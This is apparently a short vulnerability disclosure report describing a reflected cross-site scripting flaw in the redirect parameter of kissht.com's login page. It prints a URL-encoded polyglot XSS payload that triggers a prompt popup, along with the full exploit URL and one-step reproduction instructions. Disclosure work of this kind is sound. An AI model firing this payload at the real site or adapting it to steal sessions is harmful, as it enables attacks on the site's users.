Vulnerability Name : Cross Site Scripting - (on mobile opt entering page)
Vulnerable URL : https://kissht.com/login?redirect=%22%2f%3ejaVasCript%3a%2f%2a-%2f%2a%60%2f%2a%5c%60%2f%2a%27%2f%2a%22%2f%2a%2a%2f(%2f%2a%20%2a%2foNcliCk%3dprompt()%20)%2f%2f%0D%0A%0d%0a%2f%2f%3c%2fstYle%2f%3c%2ftitLe%2f%3c%2fteXtarEa%2f%3c%2fscRipt%2f--!%3e%5cx3csVg%2f%3csVg%2foNloAd%3dprompt(123)%2f%2f%3e%5cx3e
Vulnerable Parameter : redirect
Vulnerable Payload : %22%2f%3ejaVasCript%3a%2f%2a-%2f%2a%60%2f%2a%5c%60%2f%2a'%2f%2a%22%2f%2a%2a%2f(%2f%2a%20%2a%2foNcliCk%3dprompt()%20)%2f%2f%0D%0A%0d%0a%2f%2f%3c%2fstYle%2f%3c%2ftitLe%2f%3c%2fteXtarEa%2f%3c%2fscRipt%2f--!%3e%5cx3csVg%2f%3csVg%2foNloAd%3dprompt(123)%2f%2f%3e%5cx3e
How to reproduce this issue:
1. Visit the url it will give an XSS popup.
https://kissht.com/login?redirect=%22%2f%3ejaVasCript%3a%2f%2a-%2f%2a%60%2f%2a%5c%60%2f%2a%27%2f%2a%22%2f%2a%2a%2f(%2f%2a%20%2a%2foNcliCk%3dprompt()%20)%2f%2f%0D%0A%0d%0a%2f%2f%3c%2fstYle%2f%3c%2ftitLe%2f%3c%2fteXtarEa%2f%3c%2fscRipt%2f--!%3e%5cx3csVg%2f%3csVg%2foNloAd%3dprompt(123)%2f%2f%3e%5cx3e
POC :
Screenshort can be found in the attachment.
576